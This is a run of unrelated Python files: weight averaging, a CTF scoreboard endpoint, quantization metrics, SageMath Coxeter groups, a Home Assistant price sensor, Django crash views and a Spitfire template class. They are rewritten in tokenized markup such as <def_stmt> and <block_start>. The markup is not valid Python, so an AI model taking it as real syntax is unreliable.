<import_from_stmt>typing List Union<import_from_stmt>collections OrderedDict<import_stmt>glob<import_stmt>os<import_from_stmt>pathlib Path<import_stmt>torch<def_stmt>_load_weights path:str<arrow>dict<block_start>""" Load weights of a model. Args: path: Path to model weights Returns: Weights """<line_sep>weights=torch.load(path map_location=<lambda>storage loc:storage)<if_stmt>"model_state_dict"<in>weights<block_start>weights=weights["model_state_dict"]<block_end><return>weights<block_end><def_stmt>average_weights state_dicts:List[dict]<arrow>OrderedDict<block_start>""" Averaging of input weights. Args: state_dicts: Weights to average Raises: KeyError: If states do not match Returns: Averaged weights """<line_sep># source https://gist.github.com/qubvel/70c3d5e4cddcde731408f478e12ef87b params_keys=<none><for_stmt>i,state_dict enumerate(state_dicts)<block_start>model_params_keys=list(state_dict.keys())<if_stmt>params_keys<is><none><block_start>params_keys=model_params_keys<block_end><elif_stmt>params_keys<ne>model_params_keys<block_start><raise>KeyError("For checkpoint {}, expected list of params: {}, "<concat>"but found: {}".format(i params_keys model_params_keys))<block_end><block_end>average_dict=OrderedDict()<for_stmt>k state_dicts[0].keys()<block_start>average_dict[k]=torch.div(sum(state_dict[k]<for>state_dict state_dicts) len(state_dicts))<block_end><return>average_dict<block_end><def_stmt>get_averaged_weights_by_path_mask path_mask:str logdir:Union[str Path]=<none><arrow>OrderedDict<block_start>""" Averaging of input weights and saving them. 
Args: path_mask: globe-like pattern for models to average logdir: Path to logs directory Returns: Averaged weights """<if_stmt>logdir<is><none><block_start>models_pathes=glob.glob(path_mask)<block_end><else_stmt><block_start>models_pathes=glob.glob(os.path.join(logdir "checkpoints" path_mask))<block_end>all_weights=[_load_weights(path)<for>path models_pathes]<line_sep>averaged_dict=average_weights(all_weights)<line_sep><return>averaged_dict<block_end>__all__=["average_weights" "get_averaged_weights_by_path_mask"]<line_sep>
# Scores old stuff # # Helper functions # # FIXME: use ticks instead, teams are either up for the whole tick or down for the whole tick <def_stmt>_get_uptime_for_team team_id cursor<block_start>"""Calculate the uptime for a team. The uptime is normalized to 0 to 100. An uptime of 100 means the team was online for the entire tick, while an uptime of 0 means it was not online at all. :param int team_id: ID of the team. :param cursor: Cursor that points to the MySQL database. :return: Uptime of the team, between [0, 100] """<line_sep># FIXME: This currently does not work for disabled and enabled services. # We should calculate the uptime per tick. # Fetch total number of total tests made cursor.execute("""SELECT COUNT(id) AS count, service_id FROM team_service_state WHERE team_id = %s GROUP BY service_id""" (team_id ))<line_sep>total_counts=dict()<for_stmt>result cursor.fetchall()<block_start>total_counts[result["service_id"]]=result["count"]<block_end># Fetch number of tests that were successful (up and working) cursor.execute("""SELECT COUNT(id) AS count, service_id FROM team_service_state WHERE team_id = %s AND state = 'up' GROUP BY service_id""" (team_id ))<line_sep>up_counts={}<for_stmt>result cursor.fetchall()<block_start>up_counts[result["service_id"]]=result["count"]<block_end># Calculate the average uptime services=len(total_counts.keys())<line_sep>avg_uptime=0<for_stmt>service_id,total total_counts.items()<block_start>up_=up_counts[service_id]<line_sep>uptime=(up_<times>1.)/(total<times>1.)<line_sep>avg_uptime<augadd>uptime/services<block_end><return>avg_uptime<times>100<block_end>@app.route("/scores_deprecated")@requires_auth<def_stmt>scores_deprecated <block_start>"""The ``/scores`` endpoint requires authentication and expects no additional argument. It is used to retrieve the current scores for each team. It can be reached at ``/scores?secret=<API_SECRET>``. 
The JSON response is:: { "scores": {team_id: {score: int, sla: int (0-100, percentage), raw_score: int }} } :return: a JSON dictionary containing status information on the flag. """<line_sep>cursor=mysql.cursor()<line_sep>cursor.execute("""SELECT team_id, name as team_name, SUM(score) AS score FROM team_score JOIN teams ON teams.id = team_score.team_id GROUP BY team_id""")<line_sep>scores_={}<line_sep># Currently, we are multiplying overall score with overall SLA. Do we # actually want to do this, or do we want do calculate this per tick? <for_stmt>result cursor.fetchall()<block_start>team_id=result["team_id"]<line_sep>team_name=result["team_name"]<line_sep>raw_score=int(result["score"])<line_sep>sla_percentage=_get_uptime_for_team(team_id cursor)<line_sep>scores_[team_id]={"team_name":team_name "raw_score":raw_score "sla":int(sla_percentage) "score":raw_score<times>(sla_percentage/100.)}<block_end><return>json.dumps({"scores":scores_})<block_end>
# Copyright (C) 2020-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_from_stmt>copy deepcopy<import_from_stmt>functools partial<import_stmt>numpy<as>np<import_stmt>scipy<import_from_stmt>addict Dict<import_from_stmt>....algorithms.quantization utils<as>eu<import_from_stmt>....engines.ac_engine ACEngine<import_from_stmt>....graph.model_utils get_nodes_by_type<import_from_stmt>....graph.node_utils get_all_node_outputs<import_from_stmt>....graph.utils find_operation_matches<import_from_stmt>....samplers.creator create_sampler<line_sep>SPECIAL_METRICS=['cmc' 'reid_map' 'pairwise_accuracy_subsets' 'pairwise_accuracy' 'normalized_embedding_accuracy' 'face_recognition_tafa_pair_metric' 'localization_recall' 'coco_orig_keypoints_precision' 'coco_orig_segm_precision' 'coco_orig_keypoints_precision']<line_sep>METRICS_CONFIGS={'sigmoid_recom_loss':{'metrics':'log_loss' 'postprocessing':'sigmoid_normalize_recommendation'} 'coco_precision':{'metrics':'coco_precision'} 'coco_segm_precision':{'metrics':'coco_segm_precision'}}<line_sep>METRIC2PROXY_METRIC={'hit_ratio':{'persample':'sigmoid_recom_loss' 'ranking':'sigmoid_recom_loss'} 'ndcg':{'persample':'sigmoid_recom_loss' 'ranking':'sigmoid_recom_loss'} 'coco_orig_precision':{'persample':'coco_precision'} 'coco_orig_keypoints_precision':{'persample':'coco_precision'} 'coco_orig_segm_precision':{'persample':'coco_segm_precision'}}<def_stmt>create_metric_config engine algo_config:Dict force_logit_comparison=<false> logit_distance_type='cosine'<arrow>Dict<block_start><def_stmt>create_metric_params metric_name<block_start>engine_metrics_attributes=engine.get_metrics_attributes()<if_stmt>metric_name<not><in>engine_metrics_attributes<block_start>RuntimeError('Couldn\'t create metric parameters. 
'<concat>'Metric {} not registered in the engine.'.format(metric_name))<block_end>params=Dict()<line_sep>params.name=metric_name<line_sep>params.type=engine_metrics_attributes[metric_name]['type']<line_sep>params.is_special=(params.type<in>SPECIAL_METRICS)<or>force_logit_comparison<if_stmt>engine_metrics_attributes[metric_name]['direction']<eq>'higher-better'<block_start>params.comparator=(<lambda>a:a)<block_end><elif_stmt>engine_metrics_attributes[metric_name]['direction']<eq>'higher-worse'<block_start>params.comparator=(<lambda>a:-a)<block_end><else_stmt><block_start><raise>ValueError('Unexpected {} metric direction value.'.format(metric_name))<block_end>params.sort_fn=partial(sort_by_logit_distance distance=logit_distance_type)<if>params.is_special<else>partial(sort_by_metric_difference comp_fn=params.comparator)<line_sep><return>params<block_end><def_stmt>metric_to_proxy_map metrics<block_start>"""Determines which metrics need proxy metrics and creates metrics to proxy metrics map. :param metrics: optimizable metrics names :returns a dictionary of metrics to proxy metrics mapping {metric_name: 'persample': proxy_name, 'ranking': proxy_name} a list of proxy metrics names to register """<def_stmt>update_proxy_list proxy_metric_name<block_start>"""Updates a list of proxy metrics names to register. 
:return a proxy metric name in accordance with the engine naming """<line_sep>proxy_config=METRICS_CONFIGS.get(proxy_metric_name {})<line_sep>metric_config=proxy_config.get('metrics')<line_sep>postprocessing_config=proxy_config.get('postprocessing')<if_stmt>metric_config<or>postprocessing_config<block_start>to_register.add(proxy_metric_name)<block_end><return>metric_name_from_config(metric_config)<block_end>match_names_config=Dict({metric_name:{}<for>metric_name metrics})<line_sep>to_register=set()<for_stmt>metric_name,metric_type metrics<block_start><if_stmt>metric_type<in>METRIC2PROXY_METRIC<block_start>persample_metric_name=METRIC2PROXY_METRIC[metric_type].get('persample')<line_sep>persample_proxy_metric_name=update_proxy_list(persample_metric_name)<if_stmt>persample_proxy_metric_name<block_start>match_names_config[metric_name].persample=persample_proxy_metric_name<block_end>ranking_metric_name=METRIC2PROXY_METRIC[metric_type].get('ranking')<line_sep>ranking_proxy_metric_name=update_proxy_list(ranking_metric_name)<if_stmt>ranking_proxy_metric_name<block_start>match_names_config[metric_name].ranking=ranking_proxy_metric_name<block_end><block_end><block_end><return>match_names_config list(to_register)<block_end>metrics_attributes=engine.get_metrics_attributes()<line_sep># configure which metrics to optimize <if_stmt>algo_config.metrics<block_start>metrics_names=[]<for_stmt>metric algo_config.metrics<block_start>metric_type=metric.type<if>metric.type<else>metric.name<line_sep>metrics_names.append((metric.name metric_type))<block_end><block_end><else_stmt><block_start>metrics_names=[(metric_name metric_attr.get('type' metric_name))<for>metric_name,metric_attr metrics_attributes.items()]<block_end># register proxy metrics metrics_to_proxy_map,metrics_to_register=metric_to_proxy_map(metrics_names)<line_sep>register_metrics(engine metrics_to_register)<line_sep>metrics_config=Dict()<for_stmt>metric,_ 
metrics_names<block_start>persample_name=metrics_to_proxy_map[metric].get('persample' metric)<line_sep>ranking_name=metrics_to_proxy_map[metric].get('ranking' metric)<line_sep>metrics_config[metric].persample=create_metric_params(persample_name)<line_sep>metrics_config[metric].ranking=create_metric_params(ranking_name)<line_sep>metrics_config[metric].update(create_metric_params(metric))<block_end><return>metrics_config<block_end><def_stmt>metric_name_from_config metric_config<block_start><if_stmt>isinstance(metric_config str)<block_start><return>metric_config<block_end><if_stmt>isinstance(metric_config dict)<block_start><return>metric_config.get('name' metric_config['type'])<block_end><return><none><block_end><def_stmt>register_metrics engine metrics_names:list<block_start>"""Registers metrics and postprocessing in the engine. :param engine: an engine in which metrics will be registered :param metrics_names: a list of metrics names """<line_sep>registered_metrics=engine.get_metrics_attributes()<for_stmt>metric metrics_names<block_start><if_stmt>metric<not><in>METRICS_CONFIGS<block_start><raise>ValueError('Cannot register metric. Unsupported name {}.'.format(metric))<block_end>proxy_config=METRICS_CONFIGS.get(metric {})<if_stmt>'metrics'<in>proxy_config<block_start>metric_config=proxy_config['metrics']<if_stmt>metric_name_from_config(metric_config)<not><in>registered_metrics<block_start>register_metric(engine metric_config)<block_end><block_end><if_stmt>'postprocessing'<in>proxy_config<block_start>postprocessing_config=proxy_config['postprocessing']<line_sep>register_postprocessing(engine postprocessing_config)<block_end><block_end><block_end><def_stmt>sort_by_logit_distance u v reverse=<false> distance='cosine'<block_start><if_stmt>len(u)<ne>len(v)<block_start><raise>RuntimeError('Cannot compare samples. 
'<concat>'Lists of per-sample metric results should be the same length.')<block_end>kd_distance=<lambda>u v:scipy.stats.entropy(scipy.special.softmax(u) scipy.special.softmax(v))<line_sep>mse_distance=<lambda>u v:np.mean((u-v)<power>2)<line_sep>distance_function={'cosine':scipy.spatial.distance.cosine 'kd':kd_distance 'mse':mse_distance }<line_sep>distance_between_samples=np.array([distance_function[distance](ui.flatten() vi.flatten())<for>ui,vi zip(u v)])<line_sep>sorted_arr=np.argsort(distance_between_samples)<if_stmt>reverse<block_start>sorted_arr=np.flip(sorted_arr)<block_end><return>sorted_arr<block_end><def_stmt>sort_by_metric_difference u v comp_fn=<lambda>a:a reverse=<false><block_start><if_stmt>len(u)<ne>len(v)<block_start><raise>RuntimeError('Cannot compare samples. '<concat>'Lists of per-sample metric results should be the same length.')<block_end>u=np.asarray(u)<line_sep>v=np.asarray(v)<line_sep>sorted_arr=np.argsort(comp_fn(u-v))<if_stmt>reverse<block_start>sorted_arr=np.flip(sorted_arr)<block_end><return>sorted_arr<block_end><def_stmt>register_metric engine metric_config<block_start><if_stmt>isinstance(engine ACEngine)<block_start>engine.add_metric(metric_config)<block_end><else_stmt><block_start><raise>NotImplementedError('{} engine cannot register new metrics.'.format(type(engine).__name__))<block_end><block_end><def_stmt>register_postprocessing engine postprocessing_config<block_start><if_stmt>isinstance(engine ACEngine)<block_start>engine.add_postprocessing(postprocessing_config)<block_end><else_stmt><block_start><raise>NotImplementedError('{} engine cannot register new postprocessing.'.format(type(engine).__name__))<block_end><block_end><def_stmt>is_preset_performance 
config:Dict<block_start><if_stmt>config.weights.mode<eq>'symmetric'<and>config.activations.mode<eq>'symmetric'<block_start><return><true><block_end><if_stmt>config.weights.mode<eq>'asymmetric'<or>config.activations.mode<eq>'asymmetric'<block_start><return><false><block_end><if_stmt>config.preset<eq>'performance'<block_start><return><true><block_end><return><false><block_end><def_stmt>get_mixed_preset_config config:Dict<block_start>config=deepcopy(config)<line_sep>config.update(preset='mixed')<if_stmt>config.activations.mode<block_start>config.activations.mode='asymmetric'<block_end><if_stmt>config.weights.mode<block_start>config.weights.mode='symmetric'<block_end><return>config<block_end><def_stmt>get_num_of_quantized_ops model quantizable_operations<block_start>quantized_ops=set()<line_sep>nodes_to_see=[]<for_stmt>fq_node get_nodes_by_type(model ['FakeQuantize'])<block_start>nodes_to_see.extend(get_all_node_outputs(fq_node))<while_stmt>nodes_to_see<block_start>child=nodes_to_see.pop()<if_stmt>find_operation_matches(quantizable_operations child)<block_start>quantized_ops.add(child)<line_sep><continue><block_end>nodes_to_see.extend(get_all_node_outputs(child))<block_end><block_end><return>len(quantized_ops)<block_end><def_stmt>evaluate_model model engine dataset_size subset_indices=<none> print_progress=<true> metrics_config=<none> per_sample_subset_indices=<none> output_node_name=<none> stats_layout=<none> <block_start>"""Evaluates the model and processes metrics values :param model: model to evaluate :param subset_indices: image indices to evaluate on. If None evaluate on whole dataset :param per_sample_subset_indices: image indices for which to return per-sample metrics. 
If None for all predicted images :param print_progress: Whether to print inference progress :returns a dictionary of predicted metrics {metric_name: value} a dictionary of per-sample metrics values {metric_name: [values]} """<line_sep>engine.set_model(model)<line_sep>eu.select_evaluation_dataset(engine)<if_stmt><not>subset_indices<block_start>subset_indices=range(dataset_size)<block_end>index_sampler=create_sampler(engine samples=subset_indices)<line_sep>(metrics_per_sample metrics),raw_output=engine.predict(stats_layout=stats_layout sampler=index_sampler metric_per_sample=<true> print_progress=print_progress)<line_sep>raw_output=process_raw_output(raw_output output_node_name)<line_sep>metrics_per_sample=process_per_sample_metrics(metrics_per_sample metrics_config per_sample_subset_indices raw_output=raw_output)<line_sep>metrics=dict((name value)<for>name,value metrics.items()<if>name<in>metrics_config)<line_sep>eu.reset_dataset_to_default(engine)<line_sep><return>metrics metrics_per_sample<block_end><def_stmt>process_raw_output output output_node_name<block_start><if_stmt><not>output<block_start><return>[]<block_end><return>output[output_node_name]['output_logits']<block_end><def_stmt>process_per_sample_metrics metrics_per_sample metrics_config indices=<none> raw_output=<none><block_start>"""Creates a dictionary of per-sample metrics values {metric_name: [values]} :param metrics_per_sample: list of per-sample metrics :param indices: indices of samples to be considered. 
All if None :param raw_output: raw output from the model :return processed dictionary """<line_sep>metrics_to_keep={config.persample.name:config.persample<for>config metrics_config.values()}<if_stmt><not>metrics_to_keep<block_start><return>{}<block_end>processed_metrics_per_sample=dict((name [])<for>name metrics_to_keep)<for_stmt>metric_name,metric_params metrics_to_keep.items()<block_start><if_stmt>metric_params.is_special<block_start>processed_metrics_per_sample[metric_name]=raw_output<block_end><block_end><for_stmt>value metrics_per_sample<block_start><if_stmt>value['metric_name']<in>metrics_to_keep<block_start><if_stmt>metrics_to_keep[value['metric_name']].is_special<block_start><continue><block_end><if_stmt>value['result']<is><not><none><block_start>result_value=np.nanmean(value['result'])<block_end><else_stmt><block_start>result_value=<none><block_end>processed_metrics_per_sample[value['metric_name']].append(result_value)<block_end><block_end># check that all metrics have equal number of samples <if_stmt><not>len({len(value)<for>value processed_metrics_per_sample.values()})<eq>1<block_start><raise>RuntimeError('Inconsistent number of per-sample metric values')<block_end><if_stmt>indices<block_start><for_stmt>name,values processed_metrics_per_sample.items()<block_start>processed_metrics_per_sample[name]=[values[i]<for>i indices]<block_end><block_end><return>processed_metrics_per_sample<block_end>
""" Coxeter Groups """<line_sep>#***************************************************************************** # Copyright (C) 2010 <NAME> <nthiery at users.sf.net> # # Distributed under the terms of the GNU General Public License (GPL) # # http://www.gnu.org/licenses/ #***************************************************************************** <import_from_stmt>sage.combinat.root_system.weyl_group WeylGroup<import_from_stmt>sage.combinat.root_system.reflection_group_real ReflectionGroup<import_from_stmt>sage.combinat.root_system.cartan_type CartanType<def_stmt>CoxeterGroup data implementation="reflection" base_ring=<none> index_set=<none><block_start>""" Return an implementation of the Coxeter group given by ``data``. INPUT: - ``data`` -- a Cartan type (or coercible into; see :class:`CartanType`) or a Coxeter matrix or graph - ``implementation`` -- (default: ``'reflection'``) can be one of the following: * ``'permutation'`` - as a permutation representation * ``'matrix'`` - as a Weyl group (as a matrix group acting on the root space); if this is not implemented, this uses the "reflection" implementation * ``'coxeter3'`` - using the coxeter3 package * ``'reflection'`` - as elements in the reflection representation; see :class:`~sage.groups.matrix_gps.coxeter_groups.CoxeterMatrixGroup` - ``base_ring`` -- (optional) the base ring for the ``'reflection'`` implementation - ``index_set`` -- (optional) the index set for the ``'reflection'`` implementation EXAMPLES: Now assume that ``data`` represents a Cartan type. 
If ``implementation`` is not specified, the reflection representation is returned:: sage: W = CoxeterGroup(["A",2]) sage: W Finite Coxeter group over Integer Ring with Coxeter matrix: [1 3] [3 1] sage: W = CoxeterGroup(["A",3,1]); W Coxeter group over Integer Ring with Coxeter matrix: [1 3 2 3] [3 1 3 2] [2 3 1 3] [3 2 3 1] sage: W = CoxeterGroup(['H',3]); W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] We now use the ``implementation`` option:: sage: W = CoxeterGroup(["A",2], implementation = "permutation") # optional - gap3 sage: W # optional - gap3 Permutation Group with generators [(1,4)(2,3)(5,6), (1,3)(2,5)(4,6)] sage: W.category() # optional - gap3 Join of Category of finite enumerated permutation groups and Category of finite weyl groups and Category of well generated finite irreducible complex reflection groups sage: W = CoxeterGroup(["A",2], implementation="matrix") sage: W Weyl Group of type ['A', 2] (as a matrix group acting on the ambient space) sage: W = CoxeterGroup(["H",3], implementation="matrix") sage: W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup(["H",3], implementation="reflection") sage: W Finite Coxeter group over Number Field in a with defining polynomial x^2 - 5 with a = 2.236067977499790? with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup(["A",4,1], implementation="permutation") Traceback (most recent call last): ... 
ValueError: the type must be finite sage: W = CoxeterGroup(["A",4], implementation="chevie"); W # optional - gap3 Irreducible real reflection group of rank 4 and type A4 We use the different options for the "reflection" implementation:: sage: W = CoxeterGroup(["H",3], implementation="reflection", base_ring=RR) sage: W Finite Coxeter group over Real Field with 53 bits of precision with Coxeter matrix: [1 3 2] [3 1 5] [2 5 1] sage: W = CoxeterGroup([[1,10],[10,1]], implementation="reflection", index_set=['a','b'], base_ring=SR) sage: W Finite Coxeter group over Symbolic Ring with Coxeter matrix: [ 1 10] [10 1] TESTS:: sage: W = groups.misc.CoxeterGroup(["H",3]) """<if_stmt>implementation<not><in>["permutation" "matrix" "coxeter3" "reflection" "chevie" <none>]<block_start><raise>ValueError("invalid type implementation")<block_end><import_from_stmt>sage.groups.matrix_gps.coxeter_group CoxeterMatrixGroup<try_stmt><block_start>cartan_type=CartanType(data)<block_end><except_stmt>(TypeError ValueError)# If it is not a Cartan type, try to see if we can represent it as a matrix group <block_start><return>CoxeterMatrixGroup(data base_ring index_set)<block_end><if_stmt>implementation<is><none><block_start>implementation="matrix"<block_end><if_stmt>implementation<eq>"reflection"<block_start><return>CoxeterMatrixGroup(cartan_type base_ring index_set)<block_end><if_stmt>implementation<eq>"coxeter3"<block_start><try_stmt><block_start><import_from_stmt>sage.libs.coxeter3.coxeter_group CoxeterGroup<block_end><except_stmt>ImportError<block_start><raise>RuntimeError("coxeter3 must be installed")<block_end><else_stmt><block_start><return>CoxeterGroup(cartan_type)<block_end><block_end><if_stmt>implementation<eq>"permutation"<block_start><if_stmt><not>cartan_type.is_finite()<block_start><raise>ValueError("the type must be finite")<block_end><if_stmt>cartan_type.is_crystallographic()<block_start><return>WeylGroup(cartan_type 
implementation="permutation")<block_end><return>ReflectionGroup(cartan_type index_set=index_set)<block_end><elif_stmt>implementation<eq>"matrix"<block_start><if_stmt>cartan_type.is_crystallographic()<block_start><return>WeylGroup(cartan_type)<block_end><return>CoxeterMatrixGroup(cartan_type base_ring index_set)<block_end><elif_stmt>implementation<eq>"chevie"<block_start><return>ReflectionGroup(cartan_type index_set=index_set)<block_end><raise>NotImplementedError("Coxeter group of type {} as {} group not implemented".format(cartan_type implementation))<block_end><import_from_stmt>sage.misc.persist register_unpickle_override<line_sep>register_unpickle_override('sage.combinat.root_system.coxeter_group' 'CoxeterGroupAsPermutationGroup' ReflectionGroup)<line_sep>
"""Support for Flick Electric Pricing data."""<import_from_stmt>datetime timedelta<import_stmt>logging<import_stmt>async_timeout<import_from_stmt>pyflick FlickAPI FlickPrice<import_from_stmt>homeassistant.components.sensor SensorEntity<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.const ATTR_ATTRIBUTION ATTR_FRIENDLY_NAME<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>homeassistant.util.dt utcnow<import_from_stmt>.const ATTR_COMPONENTS ATTR_END_AT ATTR_START_AT DOMAIN<line_sep>_LOGGER=logging.getLogger(__name__)<line_sep>_AUTH_URL="https://api.flick.energy/identity/oauth/token"<line_sep>_RESOURCE="https://api.flick.energy/customer/mobile_provider/price"<line_sep>SCAN_INTERVAL=timedelta(minutes=5)<line_sep>ATTRIBUTION="Data provided by Flick Electric"<line_sep>FRIENDLY_NAME="Flick Power Price"<line_sep>UNIT_NAME="cents"<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant entry:ConfigEntry async_add_entities<block_start>"""Flick Sensor Setup."""<line_sep>api:FlickAPI=hass.data[DOMAIN][entry.entry_id]<line_sep>async_add_entities([FlickPricingSensor(api)] <true>)<block_end><class_stmt>FlickPricingSensor(SensorEntity)<block_start>"""Entity object for Flick Electric sensor."""<line_sep>_attr_native_unit_of_measurement=UNIT_NAME<def_stmt>__init__ self api:FlickAPI<arrow><none><block_start>"""Entity object for Flick Electric sensor."""<line_sep>self._api:FlickAPI=api<line_sep>self._price:FlickPrice=<none><line_sep>self._attributes={ATTR_ATTRIBUTION:ATTRIBUTION ATTR_FRIENDLY_NAME:FRIENDLY_NAME }<block_end>@property<def_stmt>name self<block_start>"""Return the name of the sensor."""<line_sep><return>FRIENDLY_NAME<block_end>@property<def_stmt>native_value self<block_start>"""Return the state of the sensor."""<line_sep><return>self._price.price<block_end>@property<def_stmt>extra_state_attributes self<block_start>"""Return the state 
attributes."""<line_sep><return>self._attributes<block_end><async_keyword><def_stmt>async_update self<block_start>"""Get the Flick Pricing data from the web service."""<if_stmt>self._price<and>self._price.end_at<ge>utcnow()<block_start><return><block_end># Power price data is still valid <async_keyword><with_stmt>async_timeout.timeout(60)<block_start>self._price=<await>self._api.getPricing()<block_end>self._attributes[ATTR_START_AT]=self._price.start_at<line_sep>self._attributes[ATTR_END_AT]=self._price.end_at<for_stmt>component self._price.components<block_start><if_stmt>component.charge_setter<not><in>ATTR_COMPONENTS<block_start>_LOGGER.warning("Found unknown component: %s" component.charge_setter)<line_sep><continue><block_end>self._attributes[component.charge_setter]=float(component.value)<block_end><block_end><block_end>
# coding: utf8 """ This software is licensed under the Apache 2 license, quoted below. Copyright 2014 Crystalnix Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_stmt>json<import_from_stmt>django.core.exceptions ObjectDoesNotExist<import_from_stmt>django.core.urlresolvers reverse_lazy<import_from_stmt>django.views.generic FormView<import_from_stmt>django.views.decorators.csrf csrf_exempt<import_from_stmt>django.http HttpResponse HttpResponseBadRequest<import_from_stmt>crash.forms CrashFrom CrashDescriptionForm<import_from_stmt>crash.models Crash<import_from_stmt>omaha_server.utils get_client_ip<class_stmt>CrashFormView(FormView)<block_start>http_method_names=('post' )<line_sep>form_class=CrashFrom<line_sep>@csrf_exempt<def_stmt>dispatch self *args **kwargs<block_start><return>super(CrashFormView self).dispatch(*args **kwargs)<block_end><def_stmt>form_valid self form<block_start>meta=self.request.POST.dict()<line_sep>meta.pop("appid" <none>)<line_sep>meta.pop("userid" <none>)<line_sep>obj=form.save(commit=<false>)<if_stmt>meta<block_start>obj.meta=meta<block_end>obj.ip=get_client_ip(self.request)<line_sep>obj.save()<line_sep><return>HttpResponse(obj.pk status=200)<block_end><def_stmt>form_invalid self form<block_start><return>HttpResponse(json.dumps(form.errors) status=400 
content_type='application/json')<block_end><block_end><class_stmt>CrashDescriptionFormView(FormView)<block_start>form_class=CrashDescriptionForm<line_sep>template_name='crash/crash_description.html'<line_sep>success_url=reverse_lazy('crash_description_submitted')<def_stmt>dispatch self request *args **kwargs# verify crash_id refers to valid crash object <block_start><try_stmt><block_start>self.crash=Crash.objects.select_related('crash_description').get(pk=self.kwargs.get('pk'))<block_end><except_stmt>Crash.DoesNotExist<block_start><return>HttpResponseBadRequest('no such crash')<block_end># verify there is no crash description for that object yet <try_stmt><block_start>desc=self.crash.crash_description<line_sep><return>HttpResponseBadRequest('already reported as \"%s\"'%desc.summary)<block_end><except_stmt>ObjectDoesNotExist<block_start><pass><block_end><return>super(CrashDescriptionFormView self).dispatch(request *args **kwargs)<block_end><def_stmt>get_initial self<block_start>data=super(CrashDescriptionFormView self).get_initial()<line_sep>data['description']=self.request.GET.get('comment')<line_sep><return>data<block_end><def_stmt>form_valid self form<block_start>obj=form.save(commit=<false>)<line_sep>obj.crash=self.crash<line_sep>obj.save()<line_sep><return>super(CrashDescriptionFormView self).form_valid(form)<block_end><block_end>
# Copyright 2007 The Spitfire Authors. All Rights Reserved. # # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. # an 'abstract' base class for a template, seems like a good idea for now <import_stmt>cStringIO<as>StringIO<import_from_stmt>spitfire runtime<import_from_stmt>spitfire.runtime baked<import_from_stmt>spitfire.runtime filters<import_from_stmt>spitfire.runtime udn<try_stmt><block_start><import_from_stmt>spitfire.runtime _template# pylint: disable=g-import-not-at-top <block_end><except_stmt>ImportError<block_start>_template=<none><block_end># NOTE: in some instances, this is faster than using cStringIO # this is slightly counter intuitive and probably means there is more here than # meets the eye. <class_stmt>BufferIO(list)<block_start>write=list.append<def_stmt>getvalue self<block_start><return>''.join(self)<block_end><block_end><class_stmt>_BaseSpitfireTemplate(object)# filter_function checks if the value should be filtered. If it is a # SanitizedPlaceholder or the placeholder_function has a skip_filter # annotation, there is no need to filter. Otherwise, call # self._filter_function. <block_start><def_stmt>filter_function self value placeholder_function=<none><block_start>"""Checks if the value should be filtered. If it is a SanitizedPlaceholder or the placeholder_function has a skip_filter annotation, there is no need to filter. Otherwise, call self._filter_function. Args: value: The value that may need to be filtered. placeholder_function: If present and annotated, do not filter. Returns: value, filtered if necessary. 
"""<if_stmt>isinstance(value baked.SanitizedPlaceholder)<block_start><return>value<block_end><elif_stmt>(placeholder_function<is><not><none><and>getattr(placeholder_function 'skip_filter' <false>))<block_start><return>value<block_end><else_stmt><block_start><return>self._filter_function(value)<block_end><block_end><block_end><def_stmt>get_spitfire_template_class prefer_c_extension=<true><block_start>"""Returns an appropriate SpitfireTemplate class. Args: prefer_c_extension: If set True and _template loaded properly, use the C extension's baseclass implementation. Returns: A SpitfireTemplate class with an appropriate base class. """<if_stmt>prefer_c_extension<and>_template<is><not><none><block_start>baseclass=_template.BaseSpitfireTemplate<block_end><else_stmt><block_start>baseclass=_BaseSpitfireTemplate<block_end><class_stmt>_SpitfireTemplate(baseclass)# store a reference to the filter function - this is tricky because of # some python stuff. filter functions look like this: # # def filter_function(template_instance, value): # # when this is assigned to a template instance, accessing this name # binds the function to the current instance. using the name # 'template_instance' to indicate that these functions aren't really # related to the template. <block_start>_filter_function=staticmethod(filters.simple_str_filter)<line_sep>repeat=<none><line_sep>placeholder_cache=<none><def_stmt>__init__ self search_list=<none> default_filter=<none> use_placeholder_cache=<false># use_placeholder_cache - cache the values returned from the # search_list? The cached values will live for the lifetime of # this object. 
<block_start>self.search_list=search_list<if_stmt>use_placeholder_cache<block_start>self.placeholder_cache={}<block_end><if_stmt>default_filter<is><not><none><block_start>self._filter_function=default_filter<block_end># FIXME: repeater support is not needed most of the time, just # disable it for the time being # self.repeat = spitfire.runtime.repeater.RepeatTracker() <block_end><def_stmt>get_var self name default=<none><block_start><return>udn.resolve_from_search_list(self.search_list name default)<block_end><def_stmt>has_var self name<block_start>var=self.get_var(name default=runtime.UnresolvedPlaceholder)<line_sep><return>var<is><not>runtime.UnresolvedPlaceholder<block_end>@staticmethod<def_stmt>new_buffer <block_start><return>BufferIO()<block_end><block_end><return>_SpitfireTemplate<block_end>SpitfireTemplate=get_spitfire_template_class()<def_stmt>template_method function<block_start>function.template_method=<true><line_sep>function.skip_filter=<true><line_sep><return>function<block_end>
